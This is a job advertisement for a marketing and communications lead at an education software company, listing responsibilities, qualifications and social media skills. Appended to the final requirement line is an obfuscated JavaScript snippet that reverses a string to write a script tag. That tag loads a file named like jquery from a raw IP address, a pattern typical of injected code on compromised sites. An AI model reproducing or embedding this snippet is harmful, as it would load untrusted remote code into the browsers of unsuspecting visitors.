Industry : Education Software
– Formulate, articulate and execute a strategic marketing and communications vision that internally and externally promote specific services and expertise offered in the Company.
– Lead unit level multi-media marketing and communications efforts that target internal and external audiences, support business goals and enhance the reputation of the Company.
– Work with R&D team to coordinate the refine of old programmes/products or the creation of new programmes/products
– Lead in the preparation and coordination of all Corporate Identity templates and collateral
– Coordinate, promote and support special events, conference and trade show activities.
– Develop and implement marketing plans by working with internal and external stakeholders, suppliers and marketing partners
– Prepare content for in-house, print and digital marketing communications in relations to the programme and products.
– Bachelor’s degree in Marketing, Mass Communications, Business Studies, Business Administration, or equivalent in a related field
– Experience (7-9 years) in corporate communications positions
– Skilled in Branding, Advertising / Marketing, Copywriting (incl. Corporate Business Style) and Public Relations
– Experience producing and editing informational and marketing collateral
– Experience and knowledge in marketing and communications
– Experience speaking with the media a plus
– Excellent project management and budgeting skills required
– Social Media experience including Twitter, Facebook, LinkedIn a must; Google+, YouTube, Instagram and SlideShare a plus document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))